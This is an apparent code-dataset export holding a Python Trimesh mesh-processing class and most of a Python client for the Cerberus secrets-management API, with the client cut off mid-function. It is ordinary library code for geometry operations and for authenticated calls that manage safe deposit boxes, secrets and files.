        # An edge is manifold when it borders one or two faces.
        val = self.edge_valence
        return np.logical_and(val > 0, val < 3)

    @property
    def poly_is_on_boundary(self):
        # A face is on the boundary if at least one neighbor slot is -1.
        return np.logical_not(np.all(self.adj_poly2poly != -1, axis=1))

    @property
    def edge_is_on_boundary(self):
        boundary_edges = self.adj_poly2edge[self.poly_is_on_boundary].reshape(-1)
        boundary_edges = [e for e in boundary_edges if len(self.adj_edge2poly[e]) == 1]
        # builtin bool replaces the np.bool alias removed in NumPy >= 1.24
        bool_vec = np.zeros((self.num_edges), dtype=bool)
        bool_vec[boundary_edges] = True
        return bool_vec

    @property
    def vert_is_on_boundary(self):
        boundary_verts = self.edges[self.edge_is_on_boundary].reshape(-1)
        bool_vec = np.zeros((self.num_vertices), dtype=bool)
        bool_vec[boundary_verts] = True
        return bool_vec

    @property
    def area(self):
        # Total surface area: sum of the per-triangle areas.
        return np.sum(self.simplex_metrics['area'][1])

    def normalize_area(self):
        """Uniformly scale the mesh so its total surface area is 1."""
        scale_factor = 1.0/np.sqrt(self.area)
        self.transform_scale([scale_factor, scale_factor, scale_factor])
        self.simplex_metrics['area'] = triangle_area(self.vertices, self.polys)

    def sharp_creases(self, threshold=1.0472):
        """Return a boolean mask over edges whose dihedral angle exceeds
        *threshold* (radians, default ~60°); boundary edges count as sharp."""
        e2p = self.adj_edge2poly.array
        indices = np.logical_not(np.all(e2p != -1, axis=1))
        angles = utilities.angle_between_vectors(self.poly_normals[e2p[:, 0]], self.poly_normals[e2p[:, 1]], True)[0]
        result = angles > threshold
        result[indices] = True
        return result

    def fix_poly_order(self):
        """Flip the winding of faces whose normal points away from the
        mesh centroid.

        BUG FIX: the original definition was missing ``self`` and
        referenced an undefined name ``mesh``, so any call raised.
        """
        normals = self.poly_normals
        center = self.mesh_centroid
        a = (normals - center)
        norm = np.linalg.norm(a, axis=1)
        norm.shape = (-1, 1)
        a /= norm
        condition = np.einsum("ij,ij->i", a, normals) > 0
        self.polys[condition] = np.flip(self.polys[condition], axis=1)
        self.__load_operations()

    # deprecated
    @property
    @deprecated("Use the method adj_poly2poly instead")
    def face2face(self):
        return self._AbstractMesh__adj_poly2poly
| 33.483117 | 134 | 0.616321 | from .Abstractmesh import AbstractMesh
import numpy as np
from ..utils import IO, ObservableArray, deprecated, utilities
from ..utils.load_operations import get_connectivity_info_surface as get_connectivity_info
from ..utils.load_operations import compute_vertex_normals, compute_face_normals
from ..utils.load_operations import _compute_three_vertex_normals as compute_three_normals
from ..utils.metrics import triangle_aspect_ratio, triangle_area
class Trimesh(AbstractMesh):
    """Triangle mesh built on AbstractMesh.

    Holds vertices and triangular polys plus derived state: edge and
    adjacency tables, per-poly integer labels, face/vertex normals and
    per-triangle quality metrics. Meshes can be loaded from .obj/.off/.mesh
    files or built from explicit arrays.

    Fixes applied versus the previous revision: removed NumPy aliases
    np.int/np.bool (deleted in NumPy >= 1.24) and repaired fix_poly_order,
    which was missing `self` and referenced an undefined global `mesh`.
    """

    def __init__(self, filename=None, vertices=None, polys=None, labels=None, texture=None, mtl=None, smoothness=False):
        """Build the mesh from a file or from vertex/poly arrays.

        `labels` (one int per poly) defaults to all zeros when omitted.
        """
        super(Trimesh, self).__init__()
        self.vtx_normals = None
        self.poly_normals = None
        self.texture = texture
        self.material = {}
        self.groups = {}
        self.smoothness = smoothness
        self.__map_poly_indices = []
        if mtl is not None:
            self.__load_from_file(mtl)
        if filename is not None:
            self.__load_from_file(filename)
            self._AbstractMesh__filename = filename.split('/')[-1]
        elif vertices is not None and polys is not None:
            vertices = np.array(vertices)
            polys = np.array(polys)
            self.vertices = ObservableArray(vertices.shape)
            self.vertices[:] = vertices
            self.vertices.attach(self)
            self._AbstractMesh__polys = ObservableArray(polys.shape, dtype=np.int64)
            self._AbstractMesh__polys[:] = polys
            self._AbstractMesh__polys.attach(self)
            self.__load_operations()
            if labels is not None:
                labels = np.array(labels)
                assert(labels.shape[0] == polys.shape[0])
                # np.int was removed in NumPy >= 1.24; builtin int is equivalent.
                self.labels = ObservableArray(labels.shape, dtype=int)
                self.labels[:] = labels
                self.labels.attach(self)
            else:
                self.labels = ObservableArray(polys.shape[0], dtype=int)
                self.labels[:] = np.zeros(self.labels.shape, dtype=int)
                self.labels.attach(self)
        self._AbstractMesh__poly_size = 3
        self._AbstractMesh__finished_loading = True

    def __load_operations(self):
        """Recompute connectivity, bounding box, normals and metrics after
        any change to the vertex/poly arrays."""
        self._dont_update = True
        self._AbstractMesh__boundary_needs_update = True
        self._AbstractMesh__simplex_centroids = None
        self._AbstractMesh__edges, \
        self._AbstractMesh__adj_vtx2vtx, \
        self._AbstractMesh__adj_vtx2edge, \
        self._AbstractMesh__adj_vtx2poly, \
        self._AbstractMesh__adj_edge2vtx, \
        self._AbstractMesh__adj_edge2edge, \
        self._AbstractMesh__adj_edge2poly, \
        self._AbstractMesh__adj_poly2vtx, \
        self._AbstractMesh__adj_poly2edge, \
        self._AbstractMesh__adj_poly2poly = get_connectivity_info(self.num_vertices, self.polys)
        self._AbstractMesh__update_bounding_box()
        self.reset_clipping()
        self.poly_normals = compute_face_normals(self.vertices, self.polys)
        self.vtx_normals = compute_vertex_normals(self.poly_normals, self.adj_vtx2poly._NList__list)
        self.__compute_metrics()
        self._AbstractMesh__simplex_centroids = None
        self._dont_update = False
        self.update()

    def __load_from_file(self, filename):
        """Populate the mesh from a .obj/.off/.mesh file, or read material
        data from a .mtl file (which leaves the geometry untouched)."""
        ext = filename.split('.')[-1]
        if ext == 'obj':
            self.vertices, self._AbstractMesh__polys, self.poly_normals, self.uvcoords, self.coor, self.groups = IO.read_obj(filename)
            self.vertices.attach(self)
            self._AbstractMesh__polys.attach(self)
            self.poly_normals.attach(self)
            self.uvcoords.attach(self)
            self.coor.attach(self)
        elif ext == 'mtl':
            self.material = IO.read_mtl(filename)
            return
        elif ext == 'off':
            self.vertices, self._AbstractMesh__polys = IO.read_off(filename)
            self.vertices.attach(self)
            self._AbstractMesh__polys.attach(self)
        elif ext == 'mesh':
            self.vertices, self._AbstractMesh__polys, labels = IO.read_mesh(filename)
            self.vertices.attach(self)
            self._AbstractMesh__polys.attach(self)
        else:
            raise Exception("Only .obj, .off and .mesh files are supported")
        self.labels = ObservableArray(self.num_polys, dtype=int)
        self.labels[:] = np.zeros(self.labels.shape, dtype=int) if ext != 'mesh' else labels
        self.labels.attach(self)
        self.__load_operations()
        return self

    def save_file(self, filename):
        """Write the mesh to disk; format chosen by the file extension."""
        ext = filename.split('.')[-1]
        if ext == 'obj':
            IO.save_obj(self, filename)
        elif ext == 'off':
            IO.save_off(self, filename)
        elif ext == 'mesh':
            IO.save_mesh(self, filename)
        else:
            raise Exception("Only .obj, .off and .mesh files are supported")

    def __compute_metrics(self):
        """Refresh the cached per-triangle quality metrics."""
        self.simplex_metrics['area'] = triangle_area(self.vertices, self.polys)
        self.simplex_metrics['aspect_ratio'] = triangle_aspect_ratio(self.vertices, self.polys)

    def update_metrics(self):
        """Public hook to recompute the per-triangle metrics."""
        self.__compute_metrics()

    @property
    def _map_poly_indices(self):
        # Index remapping computed lazily by boundary().
        return self.__map_poly_indices

    def boundary(self):
        """Return (visible polys, visibility mask), recomputing the clipping
        info only when it was invalidated."""
        if (self._AbstractMesh__boundary_needs_update):
            clipping_range = super(Trimesh, self).boundary()
            self._AbstractMesh__visible_polys = clipping_range
            self._AbstractMesh__boundary_cached = clipping_range
            self._AbstractMesh__boundary_needs_update = False
            self.__map_poly_indices = []
            counter = 0
            for c in clipping_range:
                if c:
                    self.__map_poly_indices.append(counter)
                else:
                    counter = counter + 1
        return self.polys[self._AbstractMesh__boundary_cached], self._AbstractMesh__boundary_cached

    def as_edges_flat(self):
        """Flattened edge index list (three edges per visible triangle)."""
        boundaries = self.boundary()[0]
        edges = np.c_[boundaries[:, :2], boundaries[:, 1:], boundaries[:, 2], boundaries[:, 0]].flatten()
        return edges

    def _as_threejs_triangle_soup(self):
        """Vertex positions and normals as float32 triangle soup for three.js."""
        tris = self.vertices[self.boundary()[0].flatten()]
        return tris.astype(np.float32), compute_three_normals(tris).astype(np.float32)

    def as_triangles(self):
        """Flattened uint32 triangle indices of the visible polys."""
        return self.boundary()[0].flatten().astype("uint32")

    def _as_threejs_colors(self, colors=None):
        """Per-vertex repetition (x3) of per-poly colors or the visibility mask."""
        if colors is not None:
            return np.repeat(colors, 3, axis=0)
        return np.repeat(self.boundary()[1], 3)

    @property
    def num_triangles(self):
        # For a triangle mesh every poly is a triangle.
        return self.num_polys

    def vertex_remove(self, vtx_id):
        """Remove a single vertex (and every poly using it)."""
        self.vertices_remove([vtx_id])

    def vertices_remove(self, vtx_ids):
        """Remove the given vertices, drop polys that reference them, and
        shift the remaining indices down to stay consistent."""
        self._dont_update = True
        vtx_ids = np.array(vtx_ids)
        for v_id in vtx_ids:
            self.vertices = np.delete(self.vertices, v_id, 0)
            condition = ((self._AbstractMesh__polys[:, 0] != v_id) &
                         (self._AbstractMesh__polys[:, 1] != v_id) &
                         (self._AbstractMesh__polys[:, 2] != v_id))
            if self.labels is not None:
                self.labels = self.labels[condition]
            self._AbstractMesh__polys = self._AbstractMesh__polys[condition]
            self._AbstractMesh__polys[(self._AbstractMesh__polys[:, 0] > v_id)] -= np.array([1, 0, 0])
            self._AbstractMesh__polys[(self._AbstractMesh__polys[:, 1] > v_id)] -= np.array([0, 1, 0])
            self._AbstractMesh__polys[(self._AbstractMesh__polys[:, 2] > v_id)] -= np.array([0, 0, 1])
            # Later ids shift down by one after each deletion.
            vtx_ids[vtx_ids > v_id] -= 1
        self.__load_operations()

    def poly_add(self, new_poly):
        """Add a single triangle (list of 3 vertex ids)."""
        self.polys_add(new_poly)

    def polys_add(self, new_polys):
        """Add triangles and rebuild the derived structures."""
        AbstractMesh.polys_add(self, new_polys)
        self.__load_operations()

    def poly_remove(self, poly_id):
        """Remove a single triangle by id."""
        self.polys_remove([poly_id])

    def polys_remove(self, poly_ids):
        """Remove the given triangles and rebuild the derived structures."""
        AbstractMesh.polys_remove(self, poly_ids)
        self.__load_operations()

    def tessellate(self):
        """Triangles are already simplices: return the polys unchanged."""
        return self.polys

    @property
    def edge_is_manifold(self):
        """Boolean mask over edges: True where an edge touches one or two polys."""
        val = self.edge_valence
        return np.logical_and(val > 0, val < 3)

    @property
    def poly_is_on_boundary(self):
        """Boolean mask over polys: True where at least one neighbour slot is -1."""
        return np.logical_not(np.all(self.adj_poly2poly != -1, axis = 1))

    @property
    def edge_is_on_boundary(self):
        """Boolean mask over edges: True for edges on the mesh boundary."""
        boundary_edges = self.adj_poly2edge[self.poly_is_on_boundary].reshape(-1)
        boundary_edges = [e for e in boundary_edges if len(self.adj_edge2poly[e]) == 1]
        # np.bool was removed in NumPy >= 1.24; builtin bool is equivalent.
        bool_vec = np.zeros((self.num_edges), dtype=bool)
        bool_vec[boundary_edges] = True
        return bool_vec

    @property
    def vert_is_on_boundary(self):
        """Boolean mask over vertices: True for vertices of boundary edges."""
        boundary_verts = self.edges[self.edge_is_on_boundary].reshape(-1)
        bool_vec = np.zeros((self.num_vertices), dtype=bool)
        bool_vec[boundary_verts] = True
        return bool_vec

    @property
    def area(self):
        """Total surface area: sum of the cached per-triangle areas."""
        return np.sum(self.simplex_metrics['area'][1])

    def normalize_area(self):
        """Uniformly scale the mesh so its total surface area becomes 1."""
        scale_factor = 1.0/np.sqrt(self.area)
        self.transform_scale([scale_factor, scale_factor, scale_factor])
        self.simplex_metrics['area'] = triangle_area(self.vertices, self.polys)

    def sharp_creases(self, threshold=1.0472):
        """Boolean mask over edges whose dihedral angle exceeds `threshold`
        (radians; default ~60 degrees). Edges with a missing neighbour are
        always marked sharp."""
        e2p = self.adj_edge2poly.array
        indices = np.logical_not(np.all(e2p != -1, axis=1))
        angles = utilities.angle_between_vectors(self.poly_normals[e2p[:,0]], self.poly_normals[e2p[:,1]], True)[0]
        result = angles > threshold
        result[indices] = True
        return result

    def fix_poly_order(self):
        """Flip the winding of polys whose normal fails the centroid test.

        BUG FIX: the method was missing `self` and referenced an undefined
        global `mesh` when flipping.
        """
        normals = self.poly_normals
        center = self.mesh_centroid
        # NOTE(review): `normals - center` mixes unit normals with a position;
        # the per-poly centroids were presumably intended here — confirm.
        a = (normals-center)
        norm = np.linalg.norm(a, axis=1)
        norm.shape = (-1,1)
        a /= norm
        condition = np.einsum("ij,ij->i", a, normals) > 0
        self.polys[condition] = np.flip(self.polys[condition], axis=1)
        self.__load_operations()

    @property
    @deprecated("Use the method adj_poly2poly instead")
    def face2face(self):
        """Deprecated alias for the poly-to-poly adjacency table."""
        return self._AbstractMesh__adj_poly2poly
| true | true |
f723344f24fecf2c220f77795855aaec82f60dcc | 27,851 | py | Python | cerberus/client.py | towermagi/cerberus-python-client | ef38356822e722fcb6a6ed4a1b38a5b493e753ae | [
"Apache-2.0"
] | null | null | null | cerberus/client.py | towermagi/cerberus-python-client | ef38356822e722fcb6a6ed4a1b38a5b493e753ae | [
"Apache-2.0"
] | null | null | null | cerberus/client.py | towermagi/cerberus-python-client | ef38356822e722fcb6a6ed4a1b38a5b493e753ae | [
"Apache-2.0"
] | null | null | null | """
Copyright 2016-present Nike, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
You may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and limitations under the License.
"""
# For python 2.7
from __future__ import print_function
import requests
from .aws_auth import AWSAuth
from .user_auth import UserAuth
from . import CerberusClientException, CLIENT_VERSION
from .util import throw_if_bad_response, get_with_retry, post_with_retry, put_with_retry, delete_with_retry, head_with_retry
import ast
import json
import logging
import sys
import warnings
import os
logger = logging.getLogger(__name__)
class CerberusClient(object):
""" Cerberus Python Client for interacting with
Cerberus APIs. Authentication is done
via the Auth Classes"""
HEADERS = {'Content-Type': 'application/json'}
def __init__(self, cerberus_url, username=None, password=None,
region='us-west-2', token=None, aws_session=None,
verbose=None):
"""
Username and password are optional, they are not needed for IAM Role Auth. If aws_session is set with
a botocore.session.Session object, the Cerberus client will sign the request using the session provided
instead of the default session.
verbose (default True) controls if the cerberus library will output some debuging statements to the
console (sys.stderr).
"""
self.cerberus_url = cerberus_url
self.username = username or ""
self.password = password or ""
self.region = region
self.token = token
if verbose is None or type(verbose) != bool:
self.verbose = True
else:
self.verbose = verbose
self.aws_session = aws_session
if self.token is None:
self._set_token()
self.HEADERS['X-Cerberus-Token'] = self.token
self.HEADERS['X-Cerberus-Client'] = 'CerberusPythonClient/' + CLIENT_VERSION
def _add_slash(self, string=None):
""" if a string doesn't end in a '/' add one """
if(not str.endswith(string, '/')):
return str.join('', [string, '/'])
return str(string)
def _set_token(self):
"""Set the Cerberus token based on auth type"""
try:
self.token = os.environ['CERBERUS_TOKEN']
if self.verbose:
print("Overriding Cerberus token with environment variable.", file=sys.stderr)
logger.info("Overriding Cerberus token with environment variable.")
return
except:
pass
if self.username:
ua = UserAuth(self.cerberus_url, self.username, self.password)
self.token = ua.get_token()
else:
awsa = AWSAuth(self.cerberus_url, region=self.region, aws_session=self.aws_session, verbose=self.verbose)
self.token = awsa.get_token()
def get_token(self):
"""Return a client token from Cerberus"""
return self.token
def get_roles(self):
"""Return all the roles (IAM or User Groups) that can be granted to a safe deposit box.
Roles are permission levels that are granted to IAM or User Groups. Associating the id for the write role
would allow that IAM or User Group to write in the safe deposit box."""
roles_resp = get_with_retry(self.cerberus_url + '/v1/role',
headers=self.HEADERS)
throw_if_bad_response(roles_resp)
return roles_resp.json()
    def get_role(self, key):
        """Return the id of the first role whose name contains *key*.

        NOTE(review): the membership test is substring-based (`key in name`),
        so e.g. 'write' would also match 'write_all' — confirm this looser
        matching is intended rather than exact name equality.

        Raises CerberusClientException when no role name contains *key*.
        """
        json_resp = self.get_roles()

        for item in json_resp:
            if key in item["name"]:
                return item["id"]

        raise CerberusClientException("Key '%s' not found" % key)
def list_roles(self):
"""Simplified version of get_roles that returns a dict of just name: id for the roles"""
json_resp = self.get_roles()
temp_dict = {}
for item in json_resp:
temp_dict[item["name"]] = item["id"]
return temp_dict
def get_categories(self):
""" Return a list of categories that a safe deposit box can belong to"""
sdb_resp = get_with_retry(self.cerberus_url + '/v1/category',
headers=self.HEADERS)
throw_if_bad_response(sdb_resp)
return sdb_resp.json()
def create_sdb(self, name, category_id, owner, description="", user_group_permissions=None,
iam_principal_permissions=None):
"""Create a safe deposit box.
You need to refresh your token before the iam role is granted permission to the new safe deposit box.
Keyword arguments:
name (string) -- name of the safe deposit box
category_id (string) -- category id that determines where to store the sdb. (ex: shared, applications)
owner (string) -- AD group that owns the safe deposit box
description (string) -- Description of the safe deposit box
user_group_permissions (list) -- list of dictionaries containing the key name and maybe role_id
iam_principal_permissions (list) -- list of dictionaries containing the key name iam_principal_arn
and role_id
"""
# Do some sanity checking
if user_group_permissions is None:
user_group_permissions = []
if iam_principal_permissions is None:
iam_principal_permissions = []
if list != type(user_group_permissions):
raise(TypeError('Expected list, but got ' + str(type(user_group_permissions))))
if list != type(iam_principal_permissions):
raise(TypeError('Expected list, but got ' + str(type(iam_principal_permissions))))
temp_data = {
"name": name,
"description": description,
"category_id": category_id,
"owner": owner,
}
if len(user_group_permissions) > 0:
temp_data["user_group_permissions"] = user_group_permissions
if len(iam_principal_permissions) > 0:
temp_data["iam_principal_permissions"] = iam_principal_permissions
data = json.encoder.JSONEncoder().encode(temp_data)
sdb_resp = post_with_retry(self.cerberus_url + '/v2/safe-deposit-box', data=str(data), headers=self.HEADERS)
throw_if_bad_response(sdb_resp)
return sdb_resp.json()
def delete_sdb(self, sdb_id):
""" Delete a safe deposit box specified by id
Keyword arguments:
sdb_id -- this is the id of the safe deposit box, not the path."""
sdb_resp = delete_with_retry(self.cerberus_url + '/v2/safe-deposit-box/' + sdb_id,
headers=self.HEADERS)
throw_if_bad_response(sdb_resp)
return sdb_resp
def get_sdbs(self):
""" Return a list of each SDB the client is authorized to view"""
sdb_resp = get_with_retry(self.cerberus_url + '/v2/safe-deposit-box',
headers=self.HEADERS)
throw_if_bad_response(sdb_resp)
return sdb_resp.json()
def get_sdb_path(self, sdb):
"""Return the path for a SDB"""
sdb_id = self.get_sdb_id(sdb)
sdb_resp = get_with_retry(
self.cerberus_url + '/v1/safe-deposit-box/' + sdb_id + '/',
headers=self.HEADERS
)
throw_if_bad_response(sdb_resp)
return sdb_resp.json()['path']
def get_sdb_keys(self, path):
"""Return the keys for a SDB, which are need for the full secure data path"""
list_resp = get_with_retry(
self.cerberus_url + '/v1/secret/' + path + '/?list=true',
headers=self.HEADERS
)
throw_if_bad_response(list_resp)
return list_resp.json()['data']['keys']
def get_sdb_id(self, sdb):
""" Return the ID for the given safe deposit box.
Keyword arguments:
sdb -- This is the name of the safe deposit box, not the path"""
json_resp = self.get_sdbs()
for r in json_resp:
if r['name'] == sdb:
return str(r['id'])
# If we haven't returned yet then we didn't find what we were
# looking for.
raise CerberusClientException("'%s' not found" % sdb)
def get_sdb_id_by_path(self, sdb_path):
""" Given the path, return the ID for the given safe deposit box."""
json_resp = self.get_sdbs()
# Deal with the supplied path possibly missing an ending slash
path = self._add_slash(sdb_path)
for r in json_resp:
if r['path'] == path:
return str(r['id'])
# If we haven't returned yet then we didn't find what we were
# looking for.
raise CerberusClientException("'%s' not found" % sdb_path)
def get_sdb_by_id(self, sdb_id):
""" Return the details for the given safe deposit box id
Keyword arguments:
sdb_id -- this is the id of the safe deposit box, not the path.
"""
sdb_resp = get_with_retry(self.cerberus_url + '/v2/safe-deposit-box/' + sdb_id,
headers=self.HEADERS)
throw_if_bad_response(sdb_resp)
return sdb_resp.json()
def get_sdb_by_path(self, sdb_path):
""" Return the details for the given safe deposit box path.
Keyword arguments:
sdb_path -- this is the path for the given safe deposit box. ex: ('shared/my-test-box')
"""
return self.get_sdb_by_id(self.get_sdb_id_by_path(sdb_path))
def get_sdb_by_name(self, sdb_name):
""" Return the details for the given safe deposit box name.
Keyword arguments:
sdb_name -- this is the name for the given safe deposit box. ex: ('My Test Box')
"""
return self.get_sdb_by_id(self.get_sdb_id(sdb_name))
def get_sdb_secret_version_paths(self, sdb_id):
""" Get SDB secret version paths. This function takes the sdb_id """
sdb_resp = get_with_retry(str.join('', [self.cerberus_url, '/v1/sdb-secret-version-paths/', sdb_id]),
headers=self.HEADERS)
throw_if_bad_response(sdb_resp)
return sdb_resp.json()
def get_sdb_secret_version_paths_by_path(self, sdb_path):
""" Get SDB secret version paths. This function takes the sdb_path """
return self.get_sdb_secret_version_paths(self.get_sdb_id_by_path(sdb_path))
def list_sdbs(self):
""" Return sdbs by Name """
sdb_raw = self.get_sdbs()
sdbs = []
for s in sdb_raw:
sdbs.append(s['name'])
return sdbs
def update_sdb(self, sdb_id, owner=None, description=None, user_group_permissions=None,
iam_principal_permissions=None):
"""
Update a safe deposit box.
Keyword arguments:
owner (string) -- AD group that owns the safe deposit box
description (string) -- Description of the safe deposit box
user_group_permissions (list) -- list of dictionaries containing the key name and maybe role_id
iam_principal_permissions (list) -- list of dictionaries containing the key name iam_principal_arn
and role_id
"""
# Grab current data
old_data = self.get_sdb_by_id(sdb_id)
# Assemble information to update
temp_data = {}
keys = ('owner', 'description', 'iam_principal_permissions', 'user_group_permissions')
for k in keys:
if k in old_data:
temp_data[k] = old_data[k]
if owner is not None:
temp_data["owner"] = owner
if description is not None:
temp_data["description"] = description
if user_group_permissions is not None and len(user_group_permissions) > 0:
temp_data["user_group_permissions"] = user_group_permissions
if iam_principal_permissions is not None and len(iam_principal_permissions) > 0:
temp_data["iam_principal_permissions"] = iam_principal_permissions
data = json.encoder.JSONEncoder().encode(temp_data)
sdb_resp = put_with_retry(self.cerberus_url + '/v2/safe-deposit-box/' + sdb_id, data=str(data),
headers=self.HEADERS)
throw_if_bad_response(sdb_resp)
return sdb_resp.json()
###------ Files ------###
def delete_file(self, secure_data_path):
"""Delete a file at the given secure data path"""
secret_resp = delete_with_retry(self.cerberus_url + '/v1/secure-file/' + secure_data_path,
headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp
def get_file_metadata(self, secure_data_path, version=None):
"""Get just the metadata for a file, not the content"""
if not version:
version = "CURRENT"
payload = {'versionId': str(version)}
secret_resp = head_with_retry(str.join('', [self.cerberus_url, '/v1/secure-file/', secure_data_path]),
params=payload, headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp.headers
def _get_file(self, secure_data_path, version=None):
"""
Return the file stored at the secure data path
Keyword arguments:
secure_data_path (string) -- full path in the secret deposit box that contains the key
/shared/sdb-path/secret
"""
if not version:
version = "CURRENT"
payload = {'versionId': str(version)}
secret_resp = get_with_retry(str.join('', [self.cerberus_url, '/v1/secure-file/', secure_data_path]),
params=payload, headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp
def _parse_metadata_filename(self, metadata):
"""
Parse the header metadata to pull out the filename and then store it under the key 'filename'
"""
index = metadata['Content-Disposition'].index('=')+1
metadata['filename'] = metadata['Content-Disposition'][index:].replace('"', '')
return metadata
def get_file(self, secure_data_path, version=None):
"""
Return a requests.structures.CaseInsensitiveDict object containing a file and the
metadata/header information around it.
The binary data of the file is under the key 'data'
"""
query = self._get_file(secure_data_path, version)
resp = query.headers.copy()
resp = self._parse_metadata_filename(resp)
resp['data'] = query.content
return resp
def get_file_data(self, secure_data_path, version=None):
"""
Return the data of a file stored at the secure data path
This only returns the file data, and does not include any of the meta information stored with it.
Keyword arguments:
secure_data_path (string) -- full path in the secret deposit box that contains the file key
"""
return self._get_file(secure_data_path, version).content
def get_file_versions(self, secure_data_path, limit=None, offset=None):
"""
Get versions of a particular file
This is just a shim to get_secret_versions
secure_data_path -- full path to the file in the safety deposit box
limit -- Default(100), limits how many records to be returned from the api at once.
offset -- Default(0), used for pagination. Will request records from the given offset.
"""
return self.get_secret_versions(secure_data_path, limit, offset)
def _get_all_file_version_ids(self, secure_data_path, limit=None):
"""
Convenience function that returns a generator that will paginate over the file version ids
secure_data_path -- full path to the file in the safety deposit box
limit -- Default(100), limits how many records to be returned from the api at once.
"""
offset = 0
# Prime the versions dictionary so that all the logic can happen in the loop
versions = {'has_next': True, 'next_offset': 0}
while (versions['has_next']):
offset = versions['next_offset']
versions = self.get_file_versions(secure_data_path, limit, offset)
for summary in versions['secure_data_version_summaries']:
yield summary
def _get_all_file_versions(self, secure_data_path, limit=None):
"""
Convenience function that returns a generator yielding the contents of all versions of
a file and its version info
secure_data_path -- full path to the file in the safety deposit box
limit -- Default(100), limits how many records to be returned from the api at once.
"""
for secret in self._get_all_file_version_ids(secure_data_path, limit):
yield {'secret': self.get_file_data(secure_data_path, version=secret['id']),
'version': secret}
def list_files(self, secure_data_path, limit=None, offset=None):
"""Return the list of files in the path. May need to be paginated"""
# Make sure that limit and offset are in range.
# Set the normal defaults
if not limit or limit <= 0:
limit = 100
if not offset or offset < 0:
offset = 0
payload = {'limit': str(limit), 'offset': str(offset)}
# Because of the addition of versionId and the way URLs are constructed, secure_data_path should
# always end in a '/'.
secure_data_path = self._add_slash(secure_data_path)
secret_resp = get_with_retry(self.cerberus_url + '/v1/secure-files/' + secure_data_path,
params=payload, headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp.json()
def put_file(self, secure_data_path, filehandle, content_type=None):
"""
Upload a file to a secure data path provided
Keyword arguments:
secure_data_path -- full path in the safety deposit box that contains the file key to store things under
filehandle -- Pass an opened filehandle to the file you want to upload.
Make sure that the file was opened in binary mode, otherwise the size calculations
can be off for text files.
content_type -- Optional. Set the Mime type of the file you're uploading.
"""
# Parse out the filename from the path
filename = secure_data_path.rsplit('/', 1)
if content_type:
data = {'file-content': (filename, filehandle, content_type)}
else:
data = {'file-content': (filename, filehandle)}
headers = self.HEADERS.copy()
if 'Content-Type' in headers:
headers.__delitem__('Content-Type')
secret_resp = post_with_retry(self.cerberus_url + '/v1/secure-file/' + secure_data_path,
files=data, headers=headers)
throw_if_bad_response(secret_resp)
return secret_resp
###------ Secrets -----####
def delete_secret(self, secure_data_path):
"""Delete a secret from the given secure data path"""
secret_resp = delete_with_retry(self.cerberus_url + '/v1/secret/' + secure_data_path,
headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp
def get_secret(self, secure_data_path, key, version=None):
"""
(Deprecated)Return the secret based on the secure data path and key
This method is deprecated because it misleads users into thinking they're only getting one value from Cerberus
when in reality they're getting all values, from which a single value is returned.
Use get_secrets_data(secure_data_path)[key] instead.
(See https://github.com/Nike-Inc/cerberus-python-client/issues/18)
"""
warnings.warn(
"get_secret is deprecated, use get_secrets_data instead",
DeprecationWarning
)
secret_resp_json = self._get_secrets(secure_data_path, version)
if key in secret_resp_json['data']:
return secret_resp_json['data'][key]
else:
raise CerberusClientException("Key '%s' not found" % key)
def _get_secrets(self, secure_data_path, version=None):
"""
Return full json secrets based on the secure data path
Keyword arguments:
secure_data_path (string) -- full path in the secret deposit box that contains the key
/shared/sdb-path/secret
"""
if not version:
version = "CURRENT"
payload = {'versionId': str(version)}
secret_resp = get_with_retry(str.join('', [self.cerberus_url, '/v1/secret/', secure_data_path]),
params=payload, headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp.json()
def get_secrets(self, secure_data_path, version=None):
"""(Deprecated)Return json secrets based on the secure data path
This method is deprecated because an addition step of reading value with ['data'] key from the returned
data is required to get secrets, which contradicts the method name.
Use get_secrets_data(secure_data_path) instead.
(See https://github.com/Nike-Inc/cerberus-python-client/issues/19)
"""
warnings.warn(
"get_secrets is deprecated, use get_secrets_data instead",
DeprecationWarning
)
return self._get_secrets(secure_data_path, version)
def get_secrets_data(self, secure_data_path, version=None):
"""Return json secrets based on the secure data path
Keyword arguments:
secure_data_path (string) -- full path in the secret deposit box that contains the key
"""
return self._get_secrets(secure_data_path, version)['data']
def get_secret_versions(self, secure_data_path, limit=None, offset=None):
"""
Get versions of a particular secret key
secure_data_path -- full path to the key in the safety deposit box
limit -- Default(100), limits how many records to be returned from the api at once.
offset -- Default(0), used for pagination. Will request records from the given offset.
"""
# Make sure that limit and offset are in range.
# Set the normal defaults
if not limit or limit <= 0:
limit = 100
if not offset or offset < 0:
offset = 0
payload = {'limit': str(limit), 'offset': str(offset)}
secret_resp = get_with_retry(str.join('', [self.cerberus_url, '/v1/secret-versions/', secure_data_path]),
params=payload, headers=self.HEADERS)
throw_if_bad_response(secret_resp)
return secret_resp.json()
def _get_all_secret_version_ids(self, secure_data_path, limit=None):
"""
Convenience function that returns a generator that will paginate over the secret version ids
secure_data_path -- full path to the key in the safety deposit box
limit -- Default(100), limits how many records to be returned from the api at once.
"""
offset = 0
# Prime the versions dictionary so that all the logic can happen in the loop
versions = {'has_next': True, 'next_offset': 0}
while (versions['has_next']):
offset = versions['next_offset']
versions = self.get_secret_versions(secure_data_path, limit, offset)
for summary in versions['secure_data_version_summaries']:
yield summary
def _get_all_secret_versions(self, secure_data_path, limit=None):
"""
Convenience function that returns a generator yielding the contents of secrets and their version info
secure_data_path -- full path to the key in the safety deposit box
limit -- Default(100), limits how many records to be returned from the api at once.
"""
for secret in self._get_all_secret_version_ids(secure_data_path, limit):
yield {'secret': self.get_secrets_data(secure_data_path, version=secret['id']),
'version': secret}
def list_secrets(self, secure_data_path):
"""Return json secrets based on the secure_data_path, this will list keys in a folder"""
# Because of the addition of versionId and the way URLs are constructed, secure_data_path should
# always end in a '/'.
secure_data_path = self._add_slash(secure_data_path)
secret_resp = get_with_retry(self.cerberus_url + '/v1/secret/' + secure_data_path + '?list=true',
headers=self.HEADERS)
